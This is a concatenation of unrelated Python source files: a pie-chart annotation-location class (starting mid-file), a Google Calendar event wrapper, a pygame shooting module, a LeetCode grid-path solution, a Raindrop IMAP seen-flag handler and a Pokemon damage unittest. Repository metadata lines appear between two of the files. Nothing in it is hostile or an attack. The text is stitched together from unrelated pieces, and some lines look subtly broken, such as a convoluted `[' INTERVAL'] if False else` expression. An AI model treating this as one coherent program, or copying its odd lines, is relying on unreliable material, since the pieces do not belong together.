                " -1, 0, or 1 were expected.")
        return result

    """
    * This method returns the annotation location whose
    * "attachment point" keeps the annotation either
    * completely outside, centered on, or completely inside
    * (depending on if the heightMultiplier of this annotation
    * is 1, 0, or -1) the point on the pie's circumference
    * associated with the given angle.
    * <p>
    *
    * The use of heightMultiplier rather than widthMultiplier
    * is somewhat arbitrary, but was chosen so that the
    * NORTH, CENTER, and SOUTH annotation locations have the
    * same interpretation for a pie slice whose bisecting
    * radius points due south (due south is the default initial
    * pie slice orientation) and for a 1px x 1px BOX_CENTER
    * type symbol positioned at the due south position on the
    * pie's circumference.  As the pie-slice-arc-bisection
    * point moves clockwise around the pie perimeter, the
    * attachment point (except for vertically-centered
    * annotations, which remain centered on the pie arc) also
    * moves clockwise, but in discrete jumps (e.g. from
    * NORTH, to NORTHEAST, to EAST, to SOUTHEAST, to SOUTH,
    * etc. for annotations inside the pie) so the annotation
    * remains appropriately attached to the center of the
    * slice's arc as the angle changes.
    *
    """
    def decodePieLocation(self, thetaMid):
        # a sin or cos that is small enough so that the
        # associated angle is horizontal (for sines) or vertical
        # (for cosines) enough to warrant use of a "centered"
        # annotation location.
        LOOKS_VERTICAL_OR_HORIZONTAL_DELTA = 0.1
        sinTheta = math.sin(thetaMid)
        cosTheta = math.cos(thetaMid)
        if cosTheta < -LOOKS_VERTICAL_OR_HORIZONTAL_DELTA:
            pieTransformedWidthMultiplier = -self.heightMultiplier
        elif cosTheta > LOOKS_VERTICAL_OR_HORIZONTAL_DELTA:
            pieTransformedWidthMultiplier = self.heightMultiplier
        else:
            pieTransformedWidthMultiplier = 0

        # NOTE(review): symmetry suggests widthMultiplier here (the
        # original carried an "XXX ?? surely this should be
        # widthMultiplier?" comment), but the method doc above states
        # that using heightMultiplier is deliberate -- behavior kept.
        if sinTheta < -LOOKS_VERTICAL_OR_HORIZONTAL_DELTA:
            pieTransformedHeightMultiplier = -self.heightMultiplier
        elif sinTheta > LOOKS_VERTICAL_OR_HORIZONTAL_DELTA:
            pieTransformedHeightMultiplier = self.heightMultiplier
        else:
            pieTransformedHeightMultiplier = 0

        return getAnnotationLocation(pieTransformedWidthMultiplier,
                    pieTransformedHeightMultiplier)
# end of class AnnotationLocation
# non-tagging-only locations used by ANCHOR_MOUSE_* symbol types
AT_THE_MOUSE = AnnotationLocation(0,0)
AT_THE_MOUSE_SNAP_TO_X = AnnotationLocation(0,0)
AT_THE_MOUSE_SNAP_TO_Y = AnnotationLocation(0,0)
"""*
** Specifies that a point's annotation (label) should
** be positioned so as to be centered on the symbol
** used to represent the point.
**
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
*"""
CENTER = AnnotationLocation(0,0)
north = AnnotationLocation(0,-1)
west = AnnotationLocation(-1, 0)
south = AnnotationLocation(0, 1)
"""*
** Specifies that a point's annotation (label) should be
** placed just above, and centered horizontally on,
** vertical bars that grow down from a horizontal
** baseline, and just below, and centered horizontally on,
** vertical bars that grow up from a horizontal baseline.
**
** <p>
**
** This another name for
** <tt>AnnotationLocation.NORTH</tt>. Its sole purpose is
** to clarify/document the behavior of this location type
** when used in conjunction with curves that employ
** <tt>VBAR_BASELINE_*</tt> symbol types.
**
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
** @see SymbolType#VBAR_BASELINE_CENTER SymbolType.VBAR_BASELINE_CENTER
**
*"""
CLOSEST_TO_HORIZONTAL_BASELINE = north
"""*
** Specifies that a point's annotation (label) should be
** placed just to the right of, and centered vertically
** on, horizontal bars that grow left from a vertical
** baseline, and just to the left of, and centered
** vertically on, horizontal bars that grow right from a
** vertical baseline.
**
** <p>
**
** This another name for
** <tt>AnnotationLocation.WEST</tt>. Its sole purpose is
** to clarify/document the behavior of this location type
** when used in conjunction with curves that employ the
** <tt>HBAR_BASELINE_*</tt> symbol types.
**
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
** @see SymbolType#HBAR_BASELINE_CENTER SymbolType.HBAR_BASELINE_CENTER
**
*"""
CLOSEST_TO_VERTICAL_BASELINE = west
"""*
** Specifies that a point's annotation (label) should
** be positioned just to the right of, and vertically
** centered on, the symbol used to represent the
** point.
**
** @see Curve.Point#setAnnotationLocation
*"""
EAST = AnnotationLocation(1, 0)
"""*
** Specifies that a point's annotation (label) should be
** placed just below, and centered horizontally on,
** vertical bars that grow down from a horizontal
** baseline, and just above, and centered horizontally on,
** vertical bars that grow up from a horizontal baseline.
**
** <p>
**
** This another name for
** <tt>AnnotationLocation.SOUTH</tt>. Its sole purpose is
** to clarify/document the behavior of this location type
** when used in conjunction with curves that employ
** <tt>VBAR_BASELINE_*</tt> symbol types.
**
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
** @see SymbolType#VBAR_BASELINE_CENTER SymbolType.VBAR_BASELINE_CENTER
**
*"""
FARTHEST_FROM_HORIZONTAL_BASELINE = south
"""*
** Specifies that a point's annotation (label) should be
** placed just to the left of, and centered vertically on,
** horizontal bars that grow left from a vertical
** baseline, and just to the right of, and centered
** vertically on, horizontal bars that grow right from a
** vertical baseline.
**
** <p>
**
** This another name for
** <tt>AnnotationLocation.EAST</tt>. Its sole purpose is
** to clarify/document the behavior of this location type
** when used in conjunction with curves that employ the
** <tt>HBAR_BASELINE_*</tt> family of symbol types.
**
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
** @see SymbolType#HBAR_BASELINE_CENTER SymbolType.HBAR_BASELINE_CENTER
**
*"""
FARTHEST_FROM_VERTICAL_BASELINE = EAST
"""*
** Specifies that a point's annotation (label) should
** be positioned just inside, and centered on, the
** arc side of a pie slice.
** <p>
**
** You can move a pie slice's annotation a specific number
** of pixels radially away from (or towards) the pie
** center by passing a positive (or negative) argument to
** the associated <tt>Point</tt>'s
** <tt>setAnnotationXShift</tt> method.
**
** <p> This is pie-friendly synonym for, and when used
** with non-pie symbol types will behave exactly the same
** as, <tt>AnnotationLocation.NORTH</tt>
**
** @see #OUTSIDE_PIE_ARC OUTSIDE_PIE_ARC
** @see #ON_PIE_ARC ON_PIE_ARC
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
** @see AnnotationLocation#NORTH NORTH
*"""
INSIDE_PIE_ARC = north
"""*
** Specifies that a point's annotation (label) should
** be positioned just above, and horizontally centered on,
** the symbol used to represent the point.
**
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
*"""
NORTH = north
"""*
** Specifies that a point's annotation (label) should
** be positioned just to the right of and above,
** the symbol used to represent the
** point.
**
** @see Curve.Point#setAnnotationLocation
*"""
NORTHEAST = AnnotationLocation(1, -1)
"""*
** Specifies that a point's annotation (label) should
** be positioned just to the left of and above,
** the symbol used to represent the
** point.
**
** @see Curve.Point#setAnnotationLocation
*"""
NORTHWEST = AnnotationLocation(-1, -1)
"""*
** Specifies that a point's annotation (label) should
** be centered on the center-point of the
** arc side of a pie slice.
** <p>
**
** You can move a pie slice's annotation a specific number
** of pixels radially away from (or towards) the pie
** center by passing a positive (or negative) argument to
** the associated <tt>Point</tt>'s
** <tt>setAnnotationXShift</tt> method.
**
**
**
** <p> This is pie-friendly synonym for, and when used
** with non-pie symbol types will behave exactly the same
** as, <tt>AnnotationLocation.CENTER</tt>
**
** @see #OUTSIDE_PIE_ARC OUTSIDE_PIE_ARC
** @see #INSIDE_PIE_ARC INSIDE_PIE_ARC
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
** @see AnnotationLocation#CENTER CENTER
**
*"""
ON_PIE_ARC = CENTER
"""*
** Specifies that a point's annotation (label) should
** be positioned just outside, and centered on, the
** arc side of a pie slice.
** <p>
**
** You can move a pie slice's annotation a specific number
** of pixels radially away from (or towards) the pie
** center by passing a positive (or negative) argument to
** the associated <tt>Point</tt>'s
** <tt>setAnnotationXShift</tt> method.
**
** <p> This is pie-friendly synonym for, and when used
** with non-pie symbol types will behave exactly the same
** as, <tt>AnnotationLocation.SOUTH</tt>
**
** @see #INSIDE_PIE_ARC INSIDE_PIE_ARC
** @see #ON_PIE_ARC ON_PIE_ARC
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
** @see Curve.Point#setAnnotationXShift setAnnotationXShift
** @see AnnotationLocation#SOUTH SOUTH
*"""
OUTSIDE_PIE_ARC = south
"""*
** Specifies that a point's annotation (label) should
** be positioned just below, and horizontally centered on,
** the symbol used to represent the point.
**
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
*"""
SOUTH = south
"""*
** Specifies that a point's annotation (label) should
** be positioned just to the right of and below,
** the symbol used to represent the
** point.
**
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
*"""
SOUTHEAST = AnnotationLocation(1, 1)
"""*
** Specifies that a point's annotation (label) should
** be positioned just to the left of and below,
** the symbol used to represent the
** point.
**
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
*"""
SOUTHWEST = AnnotationLocation(-1, 1)
"""*
** Specifies that a point's annotation (label) should
** be positioned just to the left of, and vertically
** centered on, the symbol used to represent the
** point.
**
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
*"""
WEST = west
"""Copyright (c) 2009, Sergio Gabriel Teves
All rights reserved.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
"""GoogleCalendar Helper
Version: 0.1 03-20-2009
Sergio Gabriel Teves
Initial Release
0.2 03-25-2009
Process recurrent events
#TODO: add reminders to recurrent events
0.3 03-26-2009
Add reminders limits
Add recurrence on copy method
"""
import time
import datetime
import copy
import gdata.calendar
import atom
from xml.utils import iso8601
from icalendar import Calendar as iCal, LocalTimezone
class CalendarEvent:
    """CalendarEvent
    This class is an event wrapper.
    It allows the user to add and modify events without
    having to worry about atom formats.
    """
    # NOTE(review): Python 2 code (`cmp`, `__cmp__`, `dict.has_key`); it
    # depends on the legacy gdata/atom and icalendar libraries.
    # Reminder delivery methods accepted by add_reminder().
    SMS = 'sms'
    EMAIL = 'email'
    POPUP = 'alert'
    DEFAULT = 'all'
    # Time-unit names reported by get_reminders().
    MINUTES = 'minutes'
    HOURS = 'hours'
    DAYS = 'days'
    WEEKS = 'weeks'
    # RRULE frequency values usable with set_recurrence_data().
    _DAY = 'DAILY'
    _WEEK = 'WEEKLY'
    _MONTH = 'MONTHLY'
    _YEAR = 'YEARLY'
    # Wrapped gdata.calendar.CalendarEventEntry.
    _event = None
    # Index into _event.when used when this wrapper represents one
    # occurrence of a recurrent event (see get_recurrences()).
    _rec = 0
    # Reminder clamp limits, in minutes.
    _MAX_REMINDER = 40320 # 4 WEEKS
    _MIN_REMINDER = 5
    def __init__(self, event=None, title=None, start_date=None, end_date=None, description=None, where=None):
        """Return an Event Instance
        If event is specified all other arguments are ignored
        """
        if event is not None:
            self._event = event
            # Keep occurrences chronologically ordered so that index 0 is
            # always the earliest one.
            if len(self._event.when)>0:
                self._event.when.sort(key=lambda obj: obj.start_time)
        else:
            self._event = gdata.calendar.CalendarEventEntry()
            if title is not None:
                self.set_title(title)
            if start_date is not None:
                self.set_start_date(start_date)
            if end_date is not None:
                self.set_end_date(end_date)
            if description is not None:
                self.set_description(description)
            if where is not None:
                self.set_where(where)
    def __cmp__(self, other):
        # Python 2 ordering hook: events order by start date.
        return cmp(self.get_start_date(),other.get_start_date())
    def __str__(self):
        # Debug-friendly one-line summary of the event.
        return ("{id: '%s', title: '%s', start: '%s', end: '%s', description: '%s', where: '%s'}" %
                (self.get_id(), self.get_title(),self.get_start_date(),
                 self.get_end_date(), self.get_description(), self.get_where()))
    def _encode_date(self, date):
        """Encode a date into the Atom text format.

        A datetime.date becomes 'YYYY-MM-DD' (all-day event); a
        datetime.datetime becomes a UTC 'YYYY-MM-DDTHH:MM:SS.000Z' stamp.
        """
        if date.__class__ is datetime.date:
            _date = time.strftime('%Y-%m-%d', time.gmtime(time.mktime(date.timetuple())))
        else:
            _date = time.strftime('%Y-%m-%dT%H:%M:%S.000Z', time.gmtime(time.mktime(date.timetuple())))
        return _date
    def _decode_date(self, str):
        """Decode an Atom date string into a naive datetime.

        A 10-character value is a bare date (all-day event); anything
        longer is parsed as a full ISO-8601 timestamp.
        """
        # NOTE: `str` shadows the builtin; kept for byte-compatibility.
        if len(str) == 10:
            _date = time.strptime(str, '%Y-%m-%d')
            _date = datetime.datetime(_date.tm_year, _date.tm_mon, _date.tm_mday,0,0,0)
        else:
            _date = datetime.datetime.fromtimestamp(iso8601.parse(str))
            _date = _date.replace(tzinfo=None)
        return _date
    def set_title(self, title):
        """Set the event title."""
        self._event.title = atom.Title(text=title)
    def set_start_date(self, date):
        """pass datetime.date for an all day event, no end date is necessary"""
        _date = self._encode_date(date)
        # Create the first When element on demand.
        if len(self._event.when) == 0:
            self._event.when.append(gdata.calendar.When(start_time=_date))
        else:
            self._event.when[0].start_time = _date
    def set_end_date(self, date):
        """Set the event end date (datetime.date or datetime.datetime)."""
        _date = self._encode_date(date)
        if len(self._event.when) == 0:
            self._event.when.append(gdata.calendar.When(end_time=_date))
        else:
            self._event.when[0].end_time = _date
    def set_description(self, description):
        """Set the event body text."""
        self._event.content = atom.Content(text=description)
    def set_where(self, where):
        """Set the event location string."""
        if len(self._event.where) == 0:
            self._event.where.append(gdata.calendar.Where(value_string=where))
        else:
            self._event.where[0] = gdata.calendar.Where(value_string=where)
    def get_title(self):
        """Return the event title text."""
        return self._event.title.text
    def get_start_date(self):
        """return None if no date is set"""
        _date = None
        # _rec selects the occurrence for recurrent events (0 otherwise).
        if len(self._event.when) > 0:
            _date = self._decode_date(self._event.when[self._rec].start_time)
        return _date
    def get_end_date(self):
        """return None if no date is set"""
        _date = None
        if len(self._event.when) > 0:
            _date = self._decode_date(self._event.when[self._rec].end_time)
        return _date
    def _process_recurrence(self):
        # Wrap the raw RRULE text in a VEVENT so icalendar can parse it.
        return iCal.from_string("BEGIN:VEVENT\n%sEND:VEVENT" % self._event.recurrence.text)
    def get_description(self):
        """Return the event body text, or '' when unset."""
        _str=""
        if self._event.content.text is not None:
            _str=self._event.content.text
        return _str
    def get_where(self):
        """Return the event location, or '' when unset."""
        _str = ""
        if len(self._event.where) > 0:
            if self._event.where[0].value_string is not None:
                _str = self._event.where[0].value_string
        return _str
    def get_event(self):
        """return a gdata.calendar.CalendarEventEntry"""
        return self._event
    def add_reminder(self, method="all", minutes=None, hours=None, days=None, weeks=None):
        """
        time_type could be 'minutes','hours', 'days', 'weeks'

        method is one of SMS/EMAIL/POPUP/DEFAULT; with DEFAULT ('all') the
        calendar's default reminder settings are used and any time given
        here is ignored.
        """
        if method != "all":
            # Normalise whichever unit was supplied down to minutes, then
            # clamp to the limits the service accepts.
            if weeks is not None:
                minutes = ((weeks * 7) * 24) * 60
            elif days is not None:
                minutes = (days * 24) * 60
            elif hours is not None:
                minutes = hours * 60
            if minutes > self._MAX_REMINDER:
                minutes = self._MAX_REMINDER
            elif minutes < self._MIN_REMINDER:
                minutes = self._MIN_REMINDER
            _reminder = gdata.calendar.Reminder(minutes=minutes)
        else:
            _reminder = gdata.calendar.Reminder()
        # Register 'method' as an XML attribute of the reminder element so
        # it is serialized, then set its value.
        _reminder._attributes['method'] = 'method'
        _reminder.method = method
        if len(self._event.when) == 0:
            # No When yet: create one to hang the reminder on.
            self._event.when.append(gdata.calendar.When())
            self._event.when[0].reminder.append(_reminder)
        else:
            self._event.when[0].reminder.append(_reminder)
    def get_reminders(self):
        """Return a read only list of dict in the form {method, type, time}"""
        reminders = []
        if len(self._event.when)>0:
            for a_reminder in self._event.when[0].reminder:
                _reminder = {}
                _reminder["method"] = a_reminder._ToElementTree().get("method")
                # Report the largest unit that divides the minute count
                # evenly: weeks (10080), days (1440), hours (60), minutes.
                _val = int(a_reminder.minutes)
                if _val % 10080 == 0:
                    _reminder["type"] = "weeks"
                    _reminder["time"] = _val / 10080
                elif _val % 1440 == 0:
                    _reminder["type"] = "days"
                    _reminder["time"] = _val / 1440
                elif _val % 60 == 0:
                    _reminder["type"] = "hours"
                    _reminder["time"] = _val / 60
                else:
                    _reminder["type"] = "minutes"
                    _reminder["time"] = _val
                reminders.append(_reminder)
        return reminders
    def get_id(self):
        """Return the bare event id (last URL segment, recurrence suffix
        stripped), or None for an unsaved event."""
        _id = None
        if self._event.id is not None:
            _id = self._event.id.text.split("/")[-1].split("_")[0]
        return _id
    def copy(self, event):
        """Copy title, description, where, when and recurrence from
        another CalendarEvent into this one."""
        self.set_title(event.get_title())
        self.set_description(event.get_description())
        self.set_where(event.get_where())
        # NOTE(review): when/recurrence are shared by reference, not
        # deep-copied — mutating one event affects the other.
        self._event.when = event.get_event().when
        self._event.recurrence = event.get_event().recurrence
        #self._event.who = event.who
    def get_guests(self):
        """Returns a list of dict in the form {email, name, type, status}"""
        list = []
        for p, _who in enumerate(self._event.who):
            _guest = {}
            _guest["email"] = _who.email
            _guest["name"] = _who.name
            _guest["type"] = _who.value
            if _who.attendee_status is not None:
                _guest["status"] = _who.attendee_status.value
            else:
                # Missing status is treated as accepted.
                _guest["status"] = "ACCEPTED"
            list.append(_guest)
        return list
    def add_guest(self, name, email):
        """Append an attendee to the event."""
        self._event.who.append(gdata.calendar.Who(name=name, email=email))
    def remove_guest(self, email):
        """Remove the first attendee whose email matches, if any."""
        _guest = None
        for p, _who in enumerate(self._event.who):
            if email == _who.email:
                _guest = _who
                break
        if _guest is not None:
            self._event.who.remove(_guest)
    def is_recurrent(self):
        """True when the entry carries more than one occurrence."""
        return len(self._event.when) > 1
    def get_recurrences(self):
        """Return one shallow wrapper per occurrence.

        Each copy shares the underlying entry but points its _rec index at
        a different When, so get_start_date/get_end_date differ.
        """
        list = []
        for i, a_when in enumerate(self._event.when):
            _new = copy.copy(self)
            _new._rec = i
            list.append(_new)
        return list
    def get_recurrence_data(self):
        """Parse the RRULE text into a plain dict
        (DTSTART/DTEND/FREQ and optional WKST/UNTIL/BYDAY/INTERVAL)."""
        r = {}
        # NOTE(review): wraps in BEGIN:EVENT while _process_recurrence
        # uses BEGIN:VEVENT — likely should be VEVENT here too; confirm
        # against icalendar's parser.
        c = iCal.from_string("BEGIN:EVENT\n%sEND:EVENT" % self._event.recurrence.text)
        r['DTSTART']=c['DTSTART'].dt
        r['DTEND']=c['DTEND'].dt
        r['FREQ']=c['RRULE']['FREQ'][0]
        if c['RRULE'].has_key('WKST'):
            r['WKST']=c['RRULE']['WKST'][0]
        if c['RRULE'].has_key('UNTIL'):
            r['UNTIL']=c['RRULE']['UNTIL'][0].astimezone(LocalTimezone())
        if c['RRULE'].has_key('BYDAY'):
            r['BYDAY']=c['RRULE']['BYDAY']
        if c['RRULE'].has_key('INTERVAL'):
            r['INTERVAL']=c['RRULE'][' INTERVAL'][0] if False else c['RRULE']['INTERVAL'][0]
        return r
    def set_recurrence_data(self, freq=None, by_day=None, interval=None, until=None):
        """Build and attach an RRULE from the given parts.

        freq is one of the _DAY/_WEEK/_MONTH/_YEAR constants; by_day may
        be a single day code or a list of them; until is a date whose
        time-of-day is taken from the event's end date.
        """
        # DTSTART/DTEND mirror the event's current start/end in UTC.
        rec = ('DTSTART;TZID=UTC:' + time.strftime('%Y%m%dT%H%M%SZ', self.get_start_date().timetuple()) + '\r\n'
               + 'DTEND;TZID=UTC:' + time.strftime('%Y%m%dT%H%M%SZ', self.get_end_date().timetuple()) + '\r\n'
               + 'RRULE:FREQ=' + freq)
        if by_day is not None and len(by_day)>0:
            if by_day.__class__ is list:
                rec += ';BYDAY=' + ",".join(by_day)
            else:
                rec += ';BYDAY=' + by_day
        if interval is not None:
            rec += ';INTERVAL=' + str(int(interval))
        if until is not None:
            # Combine the given day with the event's end time-of-day.
            _d = self.get_end_date()
            _until = datetime.datetime(until.year, until.month, until.day, _d.hour, _d.minute, 0)
            rec += ';UNTIL=' + time.strftime('%Y%m%dT%H%M%SZ', _until.timetuple())
        rec += "\r\n"
        self._event.recurrence = gdata.calendar.Recurrence(text=rec)
# -*- coding: utf-8 -*-
'''
Copyright (c) 2012 Clément Blaudeau
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
'''
#------------------------------
# tir.py
# Clement Blaudeau
# ******
#------------------------------
# Fichier qui gère les tirs
# des personnages
#------------------------------
import pygame
from pygame.locals import *
import general
class tir1:
    """Player's primary shot: sprites, sound and the list of live shots."""

    def __init__(self):
        # One sprite per difficulty level (general.niv indexes this list).
        self.image = [pygame.image.load("../images/tir.png").convert_alpha(),pygame.image.load("../images/tir2.png").convert_alpha(),pygame.image.load("../images/tir3.png").convert_alpha()]
        self.sound = pygame.mixer.Sound("../son/tir.ogg")
        self.positions = []  # Rects of shots currently in flight
        self.k = 0           # tick of the last shot fired (cooldown timer)

    def Progress(self):
        """Move every shot 3 px upward and drop those past the top edge.

        Bug fix: the original removed elements from ``self.positions``
        while iterating over it and advanced its manual index regardless,
        which skipped shots and mismatched indices. Rebuilding the list
        avoids mutating it during iteration.
        """
        moved = [rect.move(0, -3) for rect in self.positions]
        self.positions = [rect for rect in moved if rect.bottom >= 0]

    def Display(self, window):
        """Blit every live shot with the sprite for the current level."""
        for rect in self.positions:
            window.blit(self.image[general.niv], rect)

    def Tir(self, position):
        """Fire a new shot from ``position`` if the cooldown has elapsed."""
        # Cooldown shortens as the level (general.niv) increases.
        if ((pygame.time.get_ticks() - self.k) > 100-(5*general.niv)):
            self.k = pygame.time.get_ticks()
            general.tirs += 1
            self.sound.set_volume(0.2)
            self.sound.play()
            # Spawn slightly right of and above the shooter's rect.
            self.positions.append(Rect(0,0,20,30).move(position.left + 20, position.top - 10))
class tir2:
    """Player's secondary attack: sprites, sound and live attack rects."""

    def __init__(self):
        # One sprite per difficulty level (general.niv indexes this list).
        self.image = [pygame.image.load("../images/attaque.png").convert_alpha(),pygame.image.load("../images/attaque2.png").convert_alpha(),pygame.image.load("../images/attaque3.png").convert_alpha()]
        self.positions = []  # Rects of attacks currently in flight
        self.sound = pygame.mixer.Sound("../son/tir2.ogg")
        self.k = 0           # tick of the last attack fired (cooldown timer)

    def Progress(self):
        """Move every attack 3 px upward and drop fully off-screen ones.

        Bug fix: the original removed elements from ``self.positions``
        while iterating over it and advanced its manual index regardless,
        which skipped attacks; rebuilding the list avoids mutating it
        during iteration.
        """
        moved = [rect.move(0, -3) for rect in self.positions]
        self.positions = [rect for rect in moved if rect.top >= -50]

    def Display(self, window):
        """Blit every live attack with the sprite for the current level."""
        for rect in self.positions:
            window.blit(self.image[general.niv], rect)

    def Tir(self, position):
        """Fire an attack from ``position`` if the cooldown has elapsed."""
        if ((pygame.time.get_ticks() - self.k) > 350-(5*general.niv)):
            self.k = pygame.time.get_ticks()
            self.positions.append(Rect(0,0,20,30).move(position.left + 20, position.top - 20))
            self.sound.play()
            self.sound.set_volume(0.2)
            general.tirs += 3
UTF-8
Python
false
false
2,014
18,150,531,798,422
1238803964061f64cc625fee53cdbd58ac11a22d
fd66de82338e67291a220bb935882585f702d4bc
/Python/unique_paths_ii.py
3282b302cd6b23ef223c7e7a17e8fcbb27521b2f
[]
no_license
littleday/leetcodeOJ
https://github.com/littleday/leetcodeOJ
37361251495ce1a7a2c8c22c0d23bbaf56b3a022
c3c25fd7dce50e6a4ccfe6cf62b0578887ddfe0a
refs/heads/master
2016-08-02T20:30:26.819989
2014-10-17T00:50:13
2014-10-17T00:50:13
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
class Solution:
    # @param obstacleGrid, a list of lists of integers
    # @return an integer
    # DP method
    def uniquePathsWithObstacles(self, obstacleGrid):
        """Count paths from the top-left to the bottom-right cell, moving
        only right or down, where cells equal to 1 are obstacles.

        Returns 0 for None or an empty grid (the original crashed with an
        IndexError on [] / [[]], and compared with `== None`).
        """
        if not obstacleGrid or not obstacleGrid[0]:
            return 0
        m, n = len(obstacleGrid), len(obstacleGrid[0])
        # dp[j] = number of paths reaching column j of the current row.
        # Rolling 1-D row replaces the original m*n table.
        dp = [0] * n
        dp[0] = 1  # one way to stand at the start (unless it is blocked)
        for i in range(m):
            for j in range(n):
                if obstacleGrid[i][j] == 1:
                    # Obstacle: no path may pass through this cell.
                    dp[j] = 0
                elif j > 0:
                    # Paths from above (dp[j]) plus from the left (dp[j-1]).
                    dp[j] += dp[j - 1]
        return dp[-1]
# ***** BEGIN LICENSE BLOCK *****
# Version: MPL 1.1
#
# The contents of this file are subject to the Mozilla Public License Version
# 1.1 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
# http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS IS" basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
#
# The Original Code is Raindrop.
#
# The Initial Developer of the Original Code is
# Mozilla Messaging, Inc..
# Portions created by the Initial Developer are Copyright (C) 2009
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
#
# Takes the raw IMAP flags from an IMAP server and converts them to
# raindrop schema items which convey the same information.
# XXX - currently only '\\Seen' is supported...
from raindrop.proto.imap import get_rdkey_for_email
def handler(doc):
    """Convert raw IMAP \\Seen flags from a folder-state cache doc into
    rd.msg.seen schema items.

    NOTE(review): `open_view`, `open_schemas`, `emit_schema`,
    `hashable_key` and `logger` are not defined in this module — they are
    presumably injected by the raindrop extension runtime; confirm before
    reusing this code elsewhere.
    """
    # This is dealing with the 'imap folder state cache doc' - it stores
    # all meta-data about all items in a folder; so one document holds the
    # state for many messages. We first need to determine which are
    # different...
    rdkeys = []
    imap_flags = []
    # rd_key layout assumed to be ('folder', (account, folder_name)) —
    # TODO confirm against the imap protocol module.
    folder_name = doc['rd_key'][1][1]
    for item in doc['infos']:
        # Last ENVELOPE element is the message-id.
        msg_id = item['ENVELOPE'][-1]
        rdkey = get_rdkey_for_email(msg_id)
        rdkeys.append(rdkey)
        imap_flags.append((rdkey, item['FLAGS']))
    # Fetch the currently stored 'seen' values for all keys in one query.
    result = open_view('raindrop!content!all', 'msg-seen-flag', keys=rdkeys)
    # turn the result into a dict keyed by rdkey
    couch_values = {}
    for row in result['rows']:
        couch_values[hashable_key(row['key'])] = row['value']
    # work out which of these rdkeys actually exist in our db.
    existing_rdkeys = set()
    existing = open_schemas(((rdkey, 'rd.msg.rfc822') for rdkey in rdkeys),
                            include_docs=False)
    for e, rdkey in zip(existing, rdkeys):
        if e is not None:
            existing_rdkeys.add(rdkey)
    # find what is different...
    nnew = 0
    nupdated = 0
    # Note it is fairly common to see multiples with the same msg ID in, eg
    # a 'drafts' folder, so skip duplicates to avoid conflicts.
    seen_keys = set()
    for rdkey, flags in imap_flags:
        if rdkey in seen_keys:
            logger.info('skipping duplicate message in folder %r: %r',
                        folder_name, rdkey)
            continue
        if rdkey not in existing_rdkeys:
            # this means we haven't actually sucked the message into raindrop
            # yet (eg, --max-age may have caused only a subset of the messages
            # to be grabbed, although all messages in the folder are returned
            # in the input document)
            logger.debug('skipping message not yet in folder %r: %r',
                         folder_name, rdkey)
            continue
        seen_keys.add(rdkey)
        seen_now = "\\Seen" in flags
        try:
            couch_value = couch_values[rdkey]
        except KeyError:
            # new message
            items = {'seen' : seen_now,
                     'outgoing_state' : 'incoming',
                     }
            emit_schema('rd.msg.seen', items, rdkey)
            nnew += 1
        else:
            # If the state in couch is anything other than 'incoming'', it
            # represents a request to change the state on the server (or the
            # process of trying to update the server).
            if couch_value.get('outgoing_state') != 'incoming':
                logger.info("found outgoing 'seen' state request in doc with key %r", rdkey)
                continue
            seen_couch = couch_value['seen']
            if seen_now != seen_couch:
                # Server-side flag changed: record it, carrying _rev so
                # the write replaces the stored revision.
                items = {'seen' : seen_now,
                         'outgoing_state' : 'incoming',
                         '_rev' : couch_value['_rev'],
                         }
                emit_schema('rd.msg.seen', items, rdkey)
                nupdated += 1
    logger.info("folder %r needs %d new and %d updated 'seen' records",
                folder_name, nnew, nupdated)
import unittest
from Test.test_helper import BuildPokemonBattleWrapper
from Battle.Attack.DamageDelegates.damage_delegate import DamageDelegate
from Battle.Attack.DamageDelegates.piercedodge_2Xdelegate import PierceDodge2XDelegate
class coreDamage(unittest.TestCase):
    """Unit tests for coreDamage of the pierce-dodge 2X delegate."""

    def setUp(self):
        """Create the battle wrappers and the two delegates under test."""
        self.user = BuildPokemonBattleWrapper()
        self.target = BuildPokemonBattleWrapper()
        self.dodge = "DIG"
        # Delegate that pierces the chosen dodge move, plus a plain one
        # to serve as the damage baseline.
        self.delegate = PierceDodge2XDelegate(None, 20, 1, self.dodge)
        self.standard = DamageDelegate(None, 20, 1)

    def pierce(self):
        """ Test that the damage is doubled on pierce """
        self.target.dodge = self.dodge
        baseline = self.standard.coreDamage(self.user, self.target)
        pierced = self.delegate.coreDamage(self.user, self.target)
        assert pierced == baseline * 2, "The damage should be double on pierce"

    def noPierce(self):
        """ Test that the damage is standard when there is no pierce """
        self.target.dodge = None
        baseline = self.standard.coreDamage(self.user, self.target)
        unpierced = self.delegate.coreDamage(self.user, self.target)
        assert unpierced == baseline, "The damage should be standard on no pierce"
# Collect all test cases in this class
testcasesCoreDamage = ["pierce", "noPierce"]
# Instantiate coreDamage once per test-method name and bundle them.
